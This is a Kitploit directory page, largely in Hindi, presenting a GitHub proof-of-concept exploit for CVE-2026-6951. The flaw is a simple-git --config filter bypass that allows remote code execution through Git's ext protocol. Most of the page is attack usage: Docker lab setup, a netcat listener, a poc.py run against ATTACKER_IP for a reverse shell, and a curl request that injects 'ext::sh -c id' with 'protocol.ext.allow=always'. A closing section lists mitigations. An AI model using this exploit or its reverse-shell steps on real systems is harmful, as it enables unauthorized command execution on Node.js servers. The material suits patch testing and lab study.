Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-6951 — CVE-2026-6951 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो एक simple-git --config फ़िल्टर बायपास है जो Git ext प्रोटोकॉल के माध्यम से RCE को सक्षम बनाता है, साथ में एक Docker लैब और रिवर्स शेल पेलोड। | Kitploit
उपकरण/GitHubGitHub/eqstlab/cve-2026-6951
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubeqstlab/cve-2026-6951

CVE-2026-6951

CVE-2026-6951 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो एक simple-git --config फ़िल्टर बायपास है जो Git ext प्रोटोकॉल के माध्यम से RCE को सक्षम बनाता है, साथ में एक Docker लैब और रिवर्स शेल पेलोड।

रिपॉजिटरी देखें
111 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-6951 simple-git रिमोट कोड एक्ज़ीक्यूशन

★ CVE-2026-6951 simple-git --config विकल्प फ़िल्टर बायपास RCE PoC ★

https://github.com/user-attachments/assets/4c992530-c5bb-4ff4-be5d-af0857eebb67


अवलोकन

CVE-2026-6951 simple-git में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता है जो CVE-2022-25912 के अपूर्ण फिक्स के कारण उत्पन्न हुई है। हालाँकि -c विकल्प को अवरुद्ध कर दिया गया था, समकक्ष --config विकल्प को ठीक से प्रतिबंधित नहीं किया गया था। एक हमलावर जो Git आर्गुमेंट्स को नियंत्रित कर सकता है, ext प्रोटोकॉल को सक्षम कर सकता है और ext:: रिपॉज़िटरी URL के माध्यम से मनमाने कमांड निष्पादित कर सकता है।


प्रभावित संस्करण

श्रेणीसंस्करण
भेद्यsimple-git संस्करण 3.36.0 से पहले
पैच किया गयाsimple-git 3.36.0 या बाद का

यह वातावरण simple-git 3.35.2 और @simple-git/argv-parser 1.0.3 का उपयोग करता है।


प्रभाव

  • Node.js एप्लिकेशन के विशेषाधिकारों के साथ रिमोट कोड एक्ज़ीक्यूशन
  • संवेदनशील फ़ाइल प्रकटीकरण
  • रिवर्स शेल एक्सेस
  • एप्लिकेशन डेटा का संशोधन या विलोपन

वातावरण

भेद्य वातावरण को बनाएँ और चलाएँ।

docker build -t cve-2026-6951 .
docker run --rm -d --name cve-2026-6951 -p 9107:9107 cve-2026-6951

सेवा तक पहुँचें:

http://127.0.0.1:9107

सेवा की स्थिति जाँचें।

curl -s http://127.0.0.1:9107/api/health

एम्बेडेड नमूना रिपॉज़िटरी यहाँ उपलब्ध है:

file:///srv/git/sample.git

PoC

हमलावर सिस्टम पर एक लिसनर शुरू करें।

nc -lvnp 4444

एक्सप्लॉइट स्क्रिप्ट चलाएँ।

python3 poc.py http://127.0.0.1:9107 --lhost ATTACKER_IP --lport 4444

निम्नलिखित अनुरोध अप्रतिबंधित --config विकल्प और Git ext प्रोटोकॉल का दुरुपयोग करके id कमांड निष्पादित करता है।

curl -s -X POST http://127.0.0.1:9107/api/import \
  -H 'Content-Type: application/json' \
  --data-raw '{
    "repository":"ext::sh -c id% >&2",
    "name":"id-check",
    "options":["--config","protocol.ext.allow=always"],
    "environment":{}
  }'

शमन

  • simple-git को संस्करण 3.36.0 या बाद के संस्करण में अपग्रेड करें।
  • उपयोगकर्ता-नियंत्रित Git विकल्पों को सीधे simple-git को न पास करें।
  • केवल विश्वसनीय रिपॉज़िटरी URL स्कीमों की अनुमति दें और ext:: URL को अस्वीकार करें।
  • रिपॉज़िटरी URL और Git आर्गुमेंट्स पर सख्त allowlist सत्यापन लागू करें।

विश्लेषण

  • KR:
  • EN:
टूल डाउनलोड करें